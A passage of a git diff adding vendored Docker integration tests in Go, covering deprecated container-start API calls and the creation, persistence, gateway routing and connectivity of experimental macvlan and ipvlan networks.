checker.IsNil) + b, err2 := readBody(body) + c.Assert(err2, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + c.Assert(string(b), checker.Contains, "Minimum memory limit allowed is 4MB") +} + +// #14640 +func (s *DockerSuite) TestDeprecatedPostContainersStartWithoutLinksInHostConfig(c *check.C) { + // TODO Windows: Windows doesn't support 
supplying a hostconfig on start. + // An alternate test could be written to validate the negative testing aspect of this + testRequires(c, DaemonIsLinux) + name := "test-host-config-links" + dockerCmd(c, append([]string{"create", "--name", name, "busybox"}, sleepCommandForDaemonPlatform()...)...) + + hc := inspectFieldJSON(c, name, "HostConfig") + config := `{"HostConfig":` + hc + `}` + + res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) + b.Close() +} + +// #14640 +func (s *DockerSuite) TestDeprecatedPostContainersStartWithLinksInHostConfig(c *check.C) { + // TODO Windows: Windows doesn't support supplying a hostconfig on start. + // An alternate test could be written to validate the negative testing aspect of this + testRequires(c, DaemonIsLinux) + name := "test-host-config-links" + dockerCmd(c, "run", "--name", "foo", "-d", "busybox", "top") + dockerCmd(c, "create", "--name", name, "--link", "foo:bar", "busybox", "top") + + hc := inspectFieldJSON(c, name, "HostConfig") + config := `{"HostConfig":` + hc + `}` + + res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) + b.Close() +} + +// #14640 +func (s *DockerSuite) TestDeprecatedPostContainersStartWithLinksInHostConfigIdLinked(c *check.C) { + // Windows does not support links + testRequires(c, DaemonIsLinux) + name := "test-host-config-links" + out, _ := dockerCmd(c, "run", "--name", "link0", "-d", "busybox", "top") + id := strings.TrimSpace(out) + dockerCmd(c, "create", "--name", name, "--link", id, "busybox", "top") + + hc := inspectFieldJSON(c, name, "HostConfig") + config := `{"HostConfig":` + hc + `}` + + res, b, err := sockRequestRaw("POST", 
formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) + b.Close() +} + +func (s *DockerSuite) TestDeprecatedStartWithNilDNS(c *check.C) { + // TODO Windows: Add once DNS is supported + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "create", "busybox") + containerID := strings.TrimSpace(out) + + config := `{"HostConfig": {"Dns": null}}` + + res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+containerID+"/start"), strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) + b.Close() + + dns := inspectFieldJSON(c, containerID, "HostConfig.Dns") + c.Assert(dns, checker.Equals, "[]") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go new file mode 100644 index 0000000000..94ef9b1a00 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go @@ -0,0 +1,30 @@ +// +build !windows + +package main + +import ( + "fmt" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// #19100 This is a deprecated feature test, it should be removed in Docker 1.12 +func (s *DockerNetworkSuite) TestDeprecatedDockerNetworkStartAPIWithHostconfig(c *check.C) { + netName := "test" + conName := "foo" + dockerCmd(c, "network", "create", netName) + dockerCmd(c, "create", "--name", conName, "busybox", "top") + + config := map[string]interface{}{ + "HostConfig": map[string]interface{}{ + "NetworkMode": netName, + }, + } + _, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/"+conName+"/start"), config) + c.Assert(err, checker.IsNil) + c.Assert(waitRun(conName), checker.IsNil) + networks := 
inspectField(c, conName, "NetworkSettings.Networks") + c.Assert(networks, checker.Contains, netName, check.Commentf(fmt.Sprintf("Should contain '%s' network", netName))) + c.Assert(networks, checker.Not(checker.Contains), "bridge", check.Commentf("Should not contain 'bridge' network")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go b/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go new file mode 100644 index 0000000000..85dec31948 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go @@ -0,0 +1,594 @@ +// +build !windows + +package main + +import ( + "os/exec" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/go-check/check" +) + +var ( + MacvlanKernelSupport = testRequirement{ + func() bool { + const macvlanKernelVer = 3 // minimum macvlan kernel support + const macvlanMajorVer = 9 // minimum macvlan major kernel support + kv, err := kernel.GetKernelVersion() + if err != nil { + return false + } + // ensure Kernel version is >= v3.9 for macvlan support + if kv.Kernel < macvlanKernelVer || (kv.Kernel == macvlanKernelVer && kv.Major < macvlanMajorVer) { + return false + } + return true + }, + "kernel version failed to meet the minimum macvlan kernel requirement of 3.9", + } + IpvlanKernelSupport = testRequirement{ + func() bool { + const ipvlanKernelVer = 4 // minimum ipvlan kernel support + const ipvlanMajorVer = 2 // minimum ipvlan major kernel support + kv, err := kernel.GetKernelVersion() + if err != nil { + return false + } + // ensure Kernel version is >= v4.2 for ipvlan support + if kv.Kernel < ipvlanKernelVer || (kv.Kernel == ipvlanKernelVer && kv.Major < ipvlanMajorVer) { + return false + } + return true + }, + "kernel version failed to meet the minimum ipvlan kernel requirement of 
4.0.0", + } +) + +func (s *DockerNetworkSuite) TestDockerNetworkMacvlanPersistance(c *check.C) { + // verify the driver automatically provisions the 802.1q link (dm-dummy0.60) + testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + + // master dummy interface 'dm' abbreviation represents 'docker macvlan' + master := "dm-dummy0" + // simulate the master link the vlan tagged subinterface parent link will use + out, err := createMasterDummy(c, master) + c.Assert(err, check.IsNil, check.Commentf(out)) + // create a network specifying the desired sub-interface name + dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.60", "dm-persist") + assertNwIsAvailable(c, "dm-persist") + // Restart docker daemon to test the config has persisted to disk + s.d.Restart() + // verify network is recreated from persistence + assertNwIsAvailable(c, "dm-persist") + // cleanup the master interface that also collects the slave dev + deleteInterface(c, "dm-dummy0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIpvlanPersistance(c *check.C) { + // verify the driver automatically provisions the 802.1q link (di-dummy0.70) + testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + // master dummy interface 'di' notation represent 'docker ipvlan' + master := "di-dummy0" + // simulate the master link the vlan tagged subinterface parent link will use + out, err := createMasterDummy(c, master) + c.Assert(err, check.IsNil, check.Commentf(out)) + // create a network specifying the desired sub-interface name + dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.70", "di-persist") + assertNwIsAvailable(c, "di-persist") + // Restart docker daemon to test the config has persisted to disk + s.d.Restart() + // verify network is recreated from persistence + assertNwIsAvailable(c, "di-persist") + // cleanup the master interface that also collects the slave dev + 
deleteInterface(c, "di-dummy0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkMacvlanSubIntCreate(c *check.C) { + // verify the driver automatically provisions the 802.1q link (dm-dummy0.50) + testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + // master dummy interface 'dm' abbreviation represents 'docker macvlan' + master := "dm-dummy0" + // simulate the master link the vlan tagged subinterface parent link will use + out, err := createMasterDummy(c, master) + c.Assert(err, check.IsNil, check.Commentf(out)) + // create a network specifying the desired sub-interface name + dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.50", "dm-subinterface") + assertNwIsAvailable(c, "dm-subinterface") + // cleanup the master interface which also collects the slave dev + deleteInterface(c, "dm-dummy0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIpvlanSubIntCreate(c *check.C) { + // verify the driver automatically provisions the 802.1q link (di-dummy0.50) + testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + // master dummy interface 'dm' abbreviation represents 'docker ipvlan' + master := "di-dummy0" + // simulate the master link the vlan tagged subinterface parent link will use + out, err := createMasterDummy(c, master) + c.Assert(err, check.IsNil, check.Commentf(out)) + // create a network specifying the desired sub-interface name + dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.60", "di-subinterface") + assertNwIsAvailable(c, "di-subinterface") + // cleanup the master interface which also collects the slave dev + deleteInterface(c, "di-dummy0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkMacvlanOverlapParent(c *check.C) { + // verify the same parent interface cannot be used if already in use by an existing network + testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, 
ExperimentalDaemon) + // master dummy interface 'dm' abbreviation represents 'docker macvlan' + master := "dm-dummy0" + out, err := createMasterDummy(c, master) + c.Assert(err, check.IsNil, check.Commentf(out)) + out, err = createVlanInterface(c, master, "dm-dummy0.40", "40") + c.Assert(err, check.IsNil, check.Commentf(out)) + // create a network using an existing parent interface + dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.40", "dm-subinterface") + assertNwIsAvailable(c, "dm-subinterface") + // attempt to create another network using the same parent iface that should fail + out, _, err = dockerCmdWithError("network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.40", "dm-parent-net-overlap") + // verify that the overlap returns an error + c.Assert(err, check.NotNil) + // cleanup the master interface which also collects the slave dev + deleteInterface(c, "dm-dummy0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIpvlanOverlapParent(c *check.C) { + // verify the same parent interface cannot be used if already in use by an existing network + testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + // master dummy interface 'dm' abbreviation represents 'docker ipvlan' + master := "di-dummy0" + out, err := createMasterDummy(c, master) + c.Assert(err, check.IsNil, check.Commentf(out)) + out, err = createVlanInterface(c, master, "di-dummy0.30", "30") + c.Assert(err, check.IsNil, check.Commentf(out)) + // create a network using an existing parent interface + dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.30", "di-subinterface") + assertNwIsAvailable(c, "di-subinterface") + // attempt to create another network using the same parent iface that should fail + out, _, err = dockerCmdWithError("network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.30", "di-parent-net-overlap") + // verify that the overlap returns an error + c.Assert(err, 
check.NotNil) + // cleanup the master interface which also collects the slave dev + deleteInterface(c, "di-dummy0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkMacvlanMultiSubnet(c *check.C) { + // create a dual stack multi-subnet Macvlan bridge mode network and validate connectivity between four containers, two on each subnet + testRequires(c, DaemonIsLinux, IPv6, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=macvlan", "--ipv6", "--subnet=172.28.100.0/24", "--subnet=172.28.102.0/24", "--gateway=172.28.102.254", + "--subnet=2001:db8:abc2::/64", "--subnet=2001:db8:abc4::/64", "--gateway=2001:db8:abc4::254", "dualstackbridge") + // Ensure the network was created + assertNwIsAvailable(c, "dualstackbridge") + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.100.0/24 and 2001:db8:abc2::/64 + dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=first", "--ip", "172.28.100.20", "--ip6", "2001:db8:abc2::20", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=second", "--ip", "172.28.100.21", "--ip6", "2001:db8:abc2::21", "busybox", "top") + + // Inspect and store the v4 address from specified container on the network dualstackbridge + ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.IPAddress") + // Inspect and store the v6 address from specified container on the network dualstackbridge + ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.GlobalIPv6Address") + + // verify ipv4 connectivity to the explicit --ipv address second to first + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip)) + c.Assert(err, check.IsNil) + // verify ipv6 connectivity to the explicit --ipv6 address second to first + c.Skip("Temporarily skipping while invesitigating sporadic v6 CI issues") + _, _, err = dockerCmdWithError("exec", "second", "ping6", 
"-c", "1", strings.TrimSpace(ip6)) + c.Assert(err, check.IsNil) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.102.0/24 and 2001:db8:abc4::/64 + dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=third", "--ip", "172.28.102.20", "--ip6", "2001:db8:abc4::20", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=fourth", "--ip", "172.28.102.21", "--ip6", "2001:db8:abc4::21", "busybox", "top") + + // Inspect and store the v4 address from specified container on the network dualstackbridge + ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.IPAddress") + // Inspect and store the v6 address from specified container on the network dualstackbridge + ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.GlobalIPv6Address") + + // verify ipv4 connectivity to the explicit --ipv address from third to fourth + _, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip)) + c.Assert(err, check.IsNil) + // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth + _, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6)) + c.Assert(err, check.IsNil) + + // Inspect the v4 gateway to ensure the proper default GW was assigned + ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.Gateway") + c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.100.1") + // Inspect the v6 gateway to ensure the proper default GW was assigned + ip6gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.IPv6Gateway") + c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc2::1") + + // Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned + ip4gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.Gateway") + c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.102.254") + // 
Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned + ip6gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.IPv6Gateway") + c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc4::254") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIpvlanL2MultiSubnet(c *check.C) { + // create a dual stack multi-subnet Ipvlan L2 network and validate connectivity within the subnets, two on each subnet + testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.200.0/24", "--subnet=172.28.202.0/24", "--gateway=172.28.202.254", + "--subnet=2001:db8:abc8::/64", "--subnet=2001:db8:abc6::/64", "--gateway=2001:db8:abc6::254", "dualstackl2") + // Ensure the network was created + assertNwIsAvailable(c, "dualstackl2") + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.200.0/24 and 2001:db8:abc8::/64 + dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=first", "--ip", "172.28.200.20", "--ip6", "2001:db8:abc8::20", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=second", "--ip", "172.28.200.21", "--ip6", "2001:db8:abc8::21", "busybox", "top") + + // Inspect and store the v4 address from specified container on the network dualstackl2 + ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.IPAddress") + // Inspect and store the v6 address from specified container on the network dualstackl2 + ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.GlobalIPv6Address") + + // verify ipv4 connectivity to the explicit --ipv address second to first + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip)) + c.Assert(err, check.IsNil) + // verify ipv6 connectivity to the explicit --ipv6 address second to first + _, _, err = dockerCmdWithError("exec", 
"second", "ping6", "-c", "1", strings.TrimSpace(ip6)) + c.Assert(err, check.IsNil) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.202.0/24 and 2001:db8:abc6::/64 + dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=third", "--ip", "172.28.202.20", "--ip6", "2001:db8:abc6::20", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=fourth", "--ip", "172.28.202.21", "--ip6", "2001:db8:abc6::21", "busybox", "top") + + // Inspect and store the v4 address from specified container on the network dualstackl2 + ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.IPAddress") + // Inspect and store the v6 address from specified container on the network dualstackl2 + ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.GlobalIPv6Address") + + // verify ipv4 connectivity to the explicit --ipv address from third to fourth + _, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip)) + c.Assert(err, check.IsNil) + // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth + _, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6)) + c.Assert(err, check.IsNil) + + // Inspect the v4 gateway to ensure the proper default GW was assigned + ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.Gateway") + c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.200.1") + // Inspect the v6 gateway to ensure the proper default GW was assigned + ip6gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.IPv6Gateway") + c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc8::1") + + // Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned + ip4gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.Gateway") + c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.202.254") + // Inspect the v6 gateway 
to ensure the proper explicitly assigned default GW was assigned + ip6gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.IPv6Gateway") + c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc6::254") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIpvlanL3MultiSubnet(c *check.C) { + // create a dual stack multi-subnet Ipvlan L3 network and validate connectivity between all four containers per L3 mode + testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, IPv6, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.10.0/24", "--subnet=172.28.12.0/24", "--gateway=172.28.12.254", + "--subnet=2001:db8:abc9::/64", "--subnet=2001:db8:abc7::/64", "--gateway=2001:db8:abc7::254", "-o", "ipvlan_mode=l3", "dualstackl3") + // Ensure the network was created + assertNwIsAvailable(c, "dualstackl3") + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.10.0/24 and 2001:db8:abc9::/64 + dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=first", "--ip", "172.28.10.20", "--ip6", "2001:db8:abc9::20", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=second", "--ip", "172.28.10.21", "--ip6", "2001:db8:abc9::21", "busybox", "top") + + // Inspect and store the v4 address from specified container on the network dualstackl3 + ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.IPAddress") + // Inspect and store the v6 address from specified container on the network dualstackl3 + ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address") + + // verify ipv4 connectivity to the explicit --ipv address second to first + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip)) + c.Assert(err, check.IsNil) + // verify ipv6 connectivity to the explicit --ipv6 address second to first + _, _, err = dockerCmdWithError("exec", 
"second", "ping6", "-c", "1", strings.TrimSpace(ip6)) + c.Assert(err, check.IsNil) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.12.0/24 and 2001:db8:abc7::/64 + dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=third", "--ip", "172.28.12.20", "--ip6", "2001:db8:abc7::20", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=fourth", "--ip", "172.28.12.21", "--ip6", "2001:db8:abc7::21", "busybox", "top") + + // Inspect and store the v4 address from specified container on the network dualstackl3 + ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.IPAddress") + // Inspect and store the v6 address from specified container on the network dualstackl3 + ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address") + + // verify ipv4 connectivity to the explicit --ipv address from third to fourth + _, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip)) + c.Assert(err, check.IsNil) + // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth + _, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6)) + c.Assert(err, check.IsNil) + + // Inspect and store the v4 address from specified container on the network dualstackl3 + ip = inspectField(c, "second", "NetworkSettings.Networks.dualstackl3.IPAddress") + // Inspect and store the v6 address from specified container on the network dualstackl3 + ip6 = inspectField(c, "second", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address") + + // Verify connectivity across disparate subnets which is unique to L3 mode only + _, _, err = dockerCmdWithError("exec", "third", "ping", "-c", "1", strings.TrimSpace(ip)) + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "third", "ping6", "-c", "1", strings.TrimSpace(ip6)) + c.Assert(err, check.IsNil) + + // Inspect the v4 gateway to ensure no next hop 
is assigned in L3 mode + ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.Gateway") + c.Assert(strings.TrimSpace(ip4gw), check.Equals, "") + // Inspect the v6 gateway to ensure the explicitly specified default GW is ignored per L3 mode enabled + ip6gw := inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.IPv6Gateway") + c.Assert(strings.TrimSpace(ip6gw), check.Equals, "") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIpvlanAddressing(c *check.C) { + // Ensure the default gateways, next-hops and default dev devices are properly set + testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=macvlan", "--ipv6", "--subnet=172.28.130.0/24", + "--subnet=2001:db8:abca::/64", "--gateway=2001:db8:abca::254", "-o", "macvlan_mode=bridge", "dualstackbridge") + assertNwIsAvailable(c, "dualstackbridge") + dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=first", "busybox", "top") + // Validate macvlan bridge mode defaults gateway sets the default IPAM next-hop inferred from the subnet + out, _, err := dockerCmdWithError("exec", "first", "ip", "route") + c.Assert(err, check.IsNil) + c.Assert(out, checker.Contains, "default via 172.28.130.1 dev eth0") + // Validate macvlan bridge mode sets the v6 gateway to the user specified default gateway/next-hop + out, _, err = dockerCmdWithError("exec", "first", "ip", "-6", "route") + c.Assert(err, check.IsNil) + c.Assert(out, checker.Contains, "default via 2001:db8:abca::254 dev eth0") + + // Verify ipvlan l2 mode sets the proper default gateway routes via netlink + // for either an explicitly set route by the user or inferred via default IPAM + dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.140.0/24", "--gateway=172.28.140.254", + "--subnet=2001:db8:abcb::/64", "-o", "ipvlan_mode=l2", "dualstackl2") + assertNwIsAvailable(c, "dualstackl2") + dockerCmd(c, "run", "-d", 
"--net=dualstackl2", "--name=second", "busybox", "top") + // Validate ipvlan l2 mode defaults gateway sets the default IPAM next-hop inferred from the subnet + out, _, err = dockerCmdWithError("exec", "second", "ip", "route") + c.Assert(err, check.IsNil) + c.Assert(out, checker.Contains, "default via 172.28.140.254 dev eth0") + // Validate ipvlan l2 mode sets the v6 gateway to the user specified default gateway/next-hop + out, _, err = dockerCmdWithError("exec", "second", "ip", "-6", "route") + c.Assert(err, check.IsNil) + c.Assert(out, checker.Contains, "default via 2001:db8:abcb::1 dev eth0") + + // Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops + dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.160.0/24", "--gateway=172.28.160.254", + "--subnet=2001:db8:abcd::/64", "--gateway=2001:db8:abcd::254", "-o", "ipvlan_mode=l3", "dualstackl3") + assertNwIsAvailable(c, "dualstackl3") + dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=third", "busybox", "top") + // Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops + out, _, err = dockerCmdWithError("exec", "third", "ip", "route") + c.Assert(err, check.IsNil) + c.Assert(out, checker.Contains, "default dev eth0") + // Validate ipvlan l3 mode sets the v6 gateway to dev eth0 and disregards any explicit or inferred next-hops + out, _, err = dockerCmdWithError("exec", "third", "ip", "-6", "route") + c.Assert(err, check.IsNil) + c.Assert(out, checker.Contains, "default dev eth0") +} + +func (s *DockerSuite) TestDockerNetworkMacVlanBridgeNilParent(c *check.C) { + // macvlan bridge mode - dummy parent interface is provisioned dynamically + testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=macvlan", "dm-nil-parent") + assertNwIsAvailable(c, "dm-nil-parent") + + // start two containers on 
the same subnet + dockerCmd(c, "run", "-d", "--net=dm-nil-parent", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=dm-nil-parent", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // intra-network communications should succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestDockerNetworkMacVlanBridgeInternalMode(c *check.C) { + // macvlan bridge mode --internal containers can communicate inside the network but not externally + testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=macvlan", "--internal", "dm-internal") + assertNwIsAvailable(c, "dm-internal") + nr := getNetworkResource(c, "dm-internal") + c.Assert(nr.Internal, checker.True) + + // start two containers on the same subnet + dockerCmd(c, "run", "-d", "--net=dm-internal", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=dm-internal", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // access outside of the network should fail + result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8") + c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true}) + + // intra-network communications should succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestDockerNetworkIpvlanL2NilParent(c *check.C) { + // ipvlan l2 mode - dummy parent interface is provisioned dynamically + testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=ipvlan", "di-nil-parent") + assertNwIsAvailable(c, "di-nil-parent") + + // start two containers on the 
same subnet + dockerCmd(c, "run", "-d", "--net=di-nil-parent", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=di-nil-parent", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // intra-network communications should succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestDockerNetworkIpvlanL2InternalMode(c *check.C) { + // ipvlan l2 mode --internal containers can communicate inside the network but not externally + testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=ipvlan", "--internal", "di-internal") + assertNwIsAvailable(c, "di-internal") + nr := getNetworkResource(c, "di-internal") + c.Assert(nr.Internal, checker.True) + + // start two containers on the same subnet + dockerCmd(c, "run", "-d", "--net=di-internal", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=di-internal", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // access outside of the network should fail + result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8") + c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true}) + // intra-network communications should succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestDockerNetworkIpvlanL3NilParent(c *check.C) { + // ipvlan l3 mode - dummy parent interface is provisioned dynamically + testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=ipvlan", "--subnet=172.28.230.0/24", + "--subnet=172.28.220.0/24", "-o", "ipvlan_mode=l3", "di-nil-parent-l3") + 
